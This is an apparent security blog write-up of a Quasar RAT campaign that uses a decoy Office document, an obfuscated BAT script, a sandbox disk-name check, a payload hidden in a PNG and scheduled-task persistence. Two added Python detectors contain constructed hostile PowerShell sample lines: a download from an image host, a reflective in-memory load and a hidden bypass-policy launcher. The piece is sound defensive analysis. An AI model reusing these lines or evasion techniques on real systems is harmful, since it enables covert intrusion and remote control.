A Silent Threat in Disguise
Cybercriminals are constantly evolving their techniques to stay one step ahead of security defenses. One of the most persistent remote access trojans (RATs), Quasar RAT, has recently resurfaced with a clever twist in its delivery method. Instead of using traditional executable files, this new campaign leverages obfuscated BAT files and deceptive Office documents to quietly deploy its payload. By embedding PowerShell scripts within highly scrambled code, attackers evade detection and maintain persistence through advanced scripting and scheduled tasks. This new wave shows just how determined threat actors are in refining their methods while maintaining the same malicious goals: control, exfiltration, and evasion.
Quasar RAT Hides Behind BAT Scripts and Decoy Documents
A new campaign delivering the notorious Quasar RAT has been identified, showcasing a highly obfuscated second-stage BAT script embedded within a fake Office document. The initial dropper script, camouflaged as a document named Game_Purchase_Agreement (1).docx, cleverly initiates the download of a malicious batch file from a remote URL hosted on Gofile. Once the document is opened, it executes the batch script silently using PowerShell.
The downloaded stub.bat file is extremely obfuscated, employing a combination of broken environment variable strings, ‘goto’ jumps, and misleading function names to obscure its logic. VirusTotal gives it a detection score of only 1/61, showing how effectively it evades antivirus systems.
Once executed, the BAT script triggers two PowerShell processes. The first checks whether the malware is running in a sandbox environment by analyzing the system disk names. If it detects sandbox-related disk names like “QEMU HARDDISK” or “DADY HARDDISK,” it forcefully terminates the command process, thereby avoiding detection and analysis.
The second PowerShell process carries out the actual payload delivery. It downloads a seemingly benign PNG file from a remote image hosting site (i[.]ibb[.]co), but this image carries an encrypted and compressed Quasar RAT payload hidden within it. The PowerShell code decrypts the content with Triple DES, decompresses it with a GZip stream, and finally loads the resulting code into memory via reflection, using assembly methods such as GetAssemblies, System.Reflection.Assembly, and Invoke.
Further persistence is achieved by creating a scheduled task using a malicious XML file, ensuring that the RAT stays active even after reboot. The malware’s C2 server is hosted through portmap.io under the subdomain JamieRose-42682[.]portmap[.]io. This highly stealthy and complex delivery method signals a strong return of Quasar RAT, reinforcing its status as a persistent threat in the cybersecurity landscape.
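As an added illustration that is not part of the original post or the ISC diary, the following scoring rule checks PowerShell script-block log lines for the stages described above (disk-name sandbox check, image-host download, Triple DES plus GZip, reflective in-memory load). The log lines, indicator weights and threshold are constructed assumptions; only the disk names and the i.ibb.co host come from the write-up.

```python
"""Score PowerShell script-block log lines for the delivery chain described above.

Added example, not code from the post or the ISC diary. Log lines are constructed;
indicators come from the behaviour the post describes (disk-name sandbox check,
image download, Triple DES + GZip, reflective load). Weights and threshold are
assumptions tuned so one benign hit stays quiet but a chain stage does not.
"""
import re

INDICATORS = [  # (name, pattern, weight)
    ("sandbox_disk_check", re.compile(r"QEMU HARDDISK|DADY HARDDISK", re.I), 5),
    ("image_host_download", re.compile(r"i\.ibb\.co|DownloadData\(|DownloadString\(", re.I), 2),
    ("tripledes", re.compile(r"TripleDES", re.I), 3),
    ("gzip_stream", re.compile(r"GZipStream", re.I), 1),
    ("reflective_load", re.compile(r"Reflection\.Assembly\]::Load|GetAssemblies\(\)|EntryPoint\.Invoke\(", re.I), 4),
    ("encoded_or_hidden", re.compile(r"-enc(odedcommand)?\b|FromBase64String|-w(indowstyle)? hidden", re.I), 1),
]
THRESHOLD = 5

def score_line(line):
    """Return (score, [indicator names]) for one script-block log line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(line)]
    return sum(w for name, _, w in INDICATORS if name in hits), hits

def flag_lines(lines, threshold=THRESHOLD):
    """Return (index, score, hits) for every line scoring at or above threshold."""
    flagged = []
    for i, line in enumerate(lines):
        score, hits = score_line(line)
        if score >= threshold:
            flagged.append((i, score, hits))
    return flagged

# Constructed sample entries (not real telemetry); lines 0, 1 and 5 are benign admin use.
SAMPLE_LOGS = [
    "Get-ChildItem C:\\Users -Recurse | Measure-Object",
    "$gz = New-Object IO.Compression.GZipStream($fs, [IO.Compression.CompressionMode]::Decompress)",
    "if ((Get-WmiObject Win32_DiskDrive).Model -match 'QEMU HARDDISK|DADY HARDDISK') { Stop-Process -Name cmd -Force }",
    "$b = (New-Object Net.WebClient).DownloadData('https://i.ibb.co/<placeholder>/pic.png'); $tdes = New-Object Security.Cryptography.TripleDESCryptoServiceProvider",
    "$gz = New-Object IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress); [System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)",
    "powershell.exe -NoProfile -EncodedCommand <placeholder-base64-from-deployment-tool>",
]

if __name__ == "__main__":
    for idx, score, hits in flag_lines(SAMPLE_LOGS):
        print(f"line {idx}: score={score} hits={hits}")
```

A single GZipStream or an encoded command from a deployment tool stays below the threshold; the disk-name check, the image download paired with Triple DES, and decompression paired with a reflective load each cross it.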
What Undercode Says:
A Masterclass in Obfuscation
The use of BAT scripts for malware delivery is not new, but the level of obfuscation used in this case is noteworthy. Every aspect of the attack chain is designed to confuse analysts and bypass static detection. Variable names are random, control flow is broken using arbitrary goto statements, and even the core logic is spread across split environment variables. This makes the malware extremely difficult to deconstruct.
Sandboxes Beware
One particularly innovative feature is the sandbox detection technique. Rather than relying on process names or system artifacts that could be easily faked or disabled, the malware reads actual disk names to identify virtualized environments. This kind of check is less common and highly effective, adding a layer of anti-analysis protection.
From Images to Infection
The delivery of the payload through a PNG image demonstrates an advanced level of stealth. The use of PowerShell to decode, decrypt, decompress, and execute this image-based payload in memory means there’s no executable file ever dropped to disk. This fileless nature dramatically lowers the chances of detection by endpoint protection systems.
Persistence is Key
To ensure the RAT maintains control even after reboot, the attacker uses a scheduled task with a custom XML configuration. This persistent backdoor guarantees long-term access to the victim’s system, which could then be exploited for data exfiltration, remote control, or lateral movement.
C2 Infrastructure Points to Portmap.io
Using dynamic DNS and port forwarding platforms like Portmap.io helps attackers mask their C2 infrastructure. These services allow attackers to change IP addresses dynamically and avoid takedowns, making attribution and shutdown efforts more challenging.
Infection Timeline and Tactics
The campaign cleverly uses trusted file types and social engineering, encouraging the victim to click on what appears to be a document. As soon as it’s opened, PowerShell kicks in silently, leaving little trace. From the moment the decoy is opened, every step is automated, efficient, and quiet.
Implications for Defenders
Defenders must evolve their detection capabilities to monitor for suspicious PowerShell activity, not just known malware signatures. Monitoring for obfuscated scripts, anomalous scheduled tasks, and base64-encoded PowerShell commands decoded in memory is essential to catch such stealthy threats.
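To show what auditing for anomalous scheduled tasks means for the persistence step described earlier (a task created from an XML definition that relaunches the PowerShell chain at logon), here is an added example that is not code from the post or the campaign. Both XML documents are constructed in the real Task Scheduler schema, the stub path and arguments are placeholders, and the argument patterns are assumptions about what a hidden PowerShell launcher typically looks like.

```python
"""Audit an exported Task Scheduler XML for the persistence pattern described above.

Added example, not code from the post or the campaign. Both XML documents are
constructed in the real Task Scheduler schema (the format `schtasks /Query /XML`
exports); the stub path and arguments are placeholders, not recovered values.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = re.compile(r"(^|\\)(powershell|pwsh|cmd|wscript|cscript|mshta)(\.exe)?$", re.I)
SUSPICIOUS_ARGS = re.compile(
    r"-w(indowstyle)? hidden|-e(nc|ncodedcommand)?\b|-ep bypass|executionpolicy bypass|"
    r"downloadstring|downloaddata|\.bat\b|\\appdata\\|\\temp\\", re.I)

def audit_task_xml(xml_text):
    """Return a list of findings; an empty list means the task looks unremarkable."""
    root = ET.fromstring(xml_text)
    findings = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip()
        args = (ex.findtext("t:Arguments", "", NS) or "").strip()
        if SCRIPT_HOSTS.search(cmd):
            findings.append(f"script host action: {cmd}")
        for m in SUSPICIOUS_ARGS.finditer(args):
            findings.append(f"suspicious argument: {m.group(0)}")
    for trig in ("LogonTrigger", "BootTrigger"):  # survives reboot, as the post describes
        if root.find(f".//t:Triggers/t:{trig}", NS) is not None:
            findings.append(f"runs at {trig}")
    if (root.findtext(".//t:Settings/t:Hidden", "", NS) or "").lower() == "true":
        findings.append("task hidden from UI")
    return findings

# Constructed sample: hidden, logon-triggered, launches PowerShell on a dropped BAT (placeholder path).
SUSPECT_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-w hidden -ep bypass -c "cmd /c C:\Users\Public\stub.bat"</Arguments>
  </Exec></Actions>
</Task>"""
# Constructed sample: ordinary vendor updater on a daily calendar trigger.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T09:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files\Vendor\updater.exe</Command><Arguments>--check</Arguments>
  </Exec></Actions>
</Task>"""
```

Run `audit_task_xml` over every task exported from a host (or collected by EDR) and triage any task returning more than one finding; the benign updater returns none.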
Threat Actor Sophistication
This campaign indicates a skilled actor who understands both technical execution and social engineering. It is likely the product of an advanced threat group or an individual with substantial experience in offensive security techniques.
Future Risks
With Quasar RAT now resurfacing in more stealthy formats, similar techniques may soon be adopted by other RAT families and malware types. We might see a rise in “invisible” malware embedded in images, scripts, and even hardware metadata.
A Call for Proactive Defense
Organizations should deploy behavior-based detection, enforce strict PowerShell execution policies, and train staff to recognize decoy document tactics. The time to shift from reactive to proactive cybersecurity has never been more urgent.
Fact Checker Results:
✅ This campaign uses Quasar RAT
✅ Delivery is executed via obfuscated BAT and PowerShell scripts
⚠️ Payload hidden in image-based encryption is a rising tactic
Prediction:
This Quasar RAT variant may pave the way for more image-embedded, fileless malware attacks in the near future. Expect increased use of native Windows tools like PowerShell, WMI, and scheduled tasks for malware deployment. Security vendors will likely update behavioral detection engines to catch sandbox detection tricks and image-based payloads. As attackers keep refining their stealth, defenders must invest more in anomaly detection and threat hunting based on behavior patterns rather than static signatures. 🧠💻🛡️
References:
Reported By: isc.sans.edu